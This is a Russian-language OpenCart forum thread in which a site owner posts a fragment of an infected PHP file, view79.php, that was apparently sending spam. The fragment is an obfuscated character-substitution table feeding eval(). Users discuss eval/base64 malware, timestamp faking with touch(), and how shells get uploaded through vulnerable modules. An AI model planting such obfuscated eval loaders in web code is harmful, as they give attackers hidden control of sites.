Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

спам рассылка


vasilev86

Recommended Posts

есть файл во вложении, внутри

 'B', '0'=>'f', '3'=>'2', '2'=>'u', '5'=>'p', '4'=>'c', '7'=>'5', '6'=>'R', '9'=>'d', '8'=>'8', 'A'=>'V', 'C'=>'t', 'B'=>'E', 'E'=>'M', 'D'=>'x', 'G'=>'l', 'F'=>'1', 'I'=>'G', 'H'=>'r', 'K'=>'3', 'J'=>'A', 'M'=>'4', 'L'=>'6', 'O'=>'v', 'N'=>'m', 'Q'=>'H', 'P'=>'z', 'S'=>'b', 'R'=>'U', 'U'=>'s', 'T'=>'J', 'W'=>'O', 'V'=>'W', 'Y'=>'I', 'X'=>'k', 'Z'=>'7', 'a'=>'S', 'c'=>'Z', 'b'=>'Y', 'e'=>'Q', 'd'=>'L', 'g'=>'D', 'f'=>'w', 'i'=>'T', 'h'=>'P', 'k'=>'q', 'j'=>'o', 'm'=>'n', 'l'=>'9', 'o'=>'j', 'n'=>'X', 'q'=>'i', 'p'=>'e', 's'=>'F', 'r'=>'g', 'u'=>'N', 't'=>'K', 'w'=>'0', 'v'=>'C', 'y'=>'y', 'x'=>'a', 'z'=>'h'); eval/*mnfldqnd*/(ujmkbvoru($nhlglmduev, $clwksr));?>

 

может эта фигня рассылать спам рассылку? 

также скрин с панели управления

view79.php

spam.png

Надіслати
Поділитися на інших сайтах


25 минут назад, n3bo сказал:

eval

это ?

самый распространенный случай исполнения вредоносного кода. Подобная структура файла обозначает, что в файле содержится вирусная сигнатура, которая исполняется посредством функции php eval() и декодируется через base64. Сочетание функции eval(base64_decode самое распространенное во вредоносных скриптах, так как она позволяет исполнять вредоносный код, который находится в закодированном виде, тем самым затрудняя анализ когда

Надіслати
Поділитися на інших сайтах


Обратитесь к halfhope, он занимается подобным. Дорого, но с гарантией делает.

Вам недостаточно сейчас удалить файл и поправить что-либо, Вам нужно найти дыру, через которую это попало к Вам, т.к. почистив все - завтра опять может повториться.

Надіслати
Поділитися на інших сайтах


мне не надо его удалять, закрывать, править..

Мне нужно знать когда он появился( день, месяц, год) и залит был с опенкартом, шаблоном или позже.

Надіслати
Поділитися на інших сайтах


написал Талгату, пока молчит.

Я не с того начал - ситуация следующая ,этот домен( хостинг) создан для тестирования настроек и для тестовых заданий для новичков с форума.

Мне не надо это исправлять, мне нужно знать кто.

  • +1 1
Надіслати
Поділитися на інших сайтах


1 час назад, vasilev86 сказал:

Мне нужно знать когда он появился

у вас на скринах даты изменения файлов указаны

 

39 минут назад, vasilev86 сказал:

мне нужно знать кто

для этого нужно изучать логи (как вариант - отталкиваясь от даты изменения)

Надіслати
Поділитися на інших сайтах

  • 2 weeks later...

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

Замечу от себя, установкой ocStore и Шаблон "Magazin" для ocStore/Opencart  в этот период времени занимался Валерий - kvr66

Надіслати
Поділитися на інших сайтах


4 минуты назад, vasilev86 сказал:

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

 

Ну.. не думаю что кто у нас с форума будет заниматься такой ...
Репутация дороже денег
Скорее всего сломали хостера или соседей или ... поставили условно - бесплатный модуль (shareware), где скорее всего в лицензии было написано, что они "имеют право" рассылать "спам" в обмен на "использование" модуля. Сейчас очень много "вирусов" (под windows и т п) используют такую тактику и антивирусы не имеют право даже удалять их (лицензионное соглашение на использование "программы"). Т .е. типа программа "декодер" а в условиях лицензионного соглашения написано на 100500 странице что используя его вы разрешаете использовать свой компьютер в любых целях. :ugeek:

Надіслати
Поділитися на інших сайтах

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

Надіслати
Поділитися на інших сайтах


41 минуту назад, vasilev86 сказал:

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

Надіслати
Поділитися на інших сайтах

15 минут назад, markimax сказал:

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

Надіслати
Поділитися на інших сайтах


5 часов назад, vasilev86 сказал:

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

  • +1 1
Надіслати
Поділитися на інших сайтах

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

  • +1 1
Надіслати
Поділитися на інших сайтах

14 часов назад, snastik сказал:

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

Спасибо, буду знать, я действительно этого не знал.

логи из панели управления исчезли,они были 100%, при первой рассылки я их видел, файлы изменены на view79.php.virus

[2017-03-13 20:18:07] logged
[2017-02-25 19:15:11] logged 

запрос поддержки тоже результата не дал.

Максим Владимирович 11.04.17 22:34

Здравствуйте

К сожалению нет.
Лог файлов за 1-го число у нас нет.
Для хранения лог файлов необходимо активировать такую функцию в настройках домена - панель хостинга - Домены, напротив домена кнопка Настройки.

 

Валерия я указал для того, чтобы подтвердить что этим занимался не абы кто.

 

Цитата

 

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

 

эти выводы я сделал по советам выше 

 

Цитата

у вас на скринах даты изменения файлов указаны

 

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел, т.к в админку практически не заходил.

 

 JohnnyVega

10 часов назад, JohnnyVega сказал:

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

Покажите хоть одного человека( исполнителя) которому я не заплатил ? или не доплатил ?  

Да, я не могу себе позволить работать с супер пупер программистами за $ 30  за правку , для меня это дорого.

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

Надіслати
Поділитися на інших сайтах


34 минуты назад, vasilev86 сказал:

 

  11.04.17 22:34

 

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел

 

 

Это дополнение для обхода загрузки через  FTP

Надіслати
Поділитися на інших сайтах


42 минуты назад, vasilev86 сказал:

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

Установите кассовый апарат тож с вареза))
по поводу выводов - это стёб - на ваше *модули по триста - это дорого а развод от государства на всякие кассовые апараты в виде калькулятора 50х за 5 - 10к это норм*
улыбнитесь уже бедолага. спасибо что показали наконец кто вы есть.

к стати аваторы часто (не всегда) отражают юзеров в жизни)) подсознательный выбор называется)

photo-706311.gif

Надіслати
Поділитися на інших сайтах


1 минуту назад, vilka сказал:

 

Это дополнение для обхода загрузки через  FTP

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

Надіслати
Поділитися на інших сайтах


Только что, vasilev86 сказал:

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

для загрузки \ установки файлов без настроек FTP

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.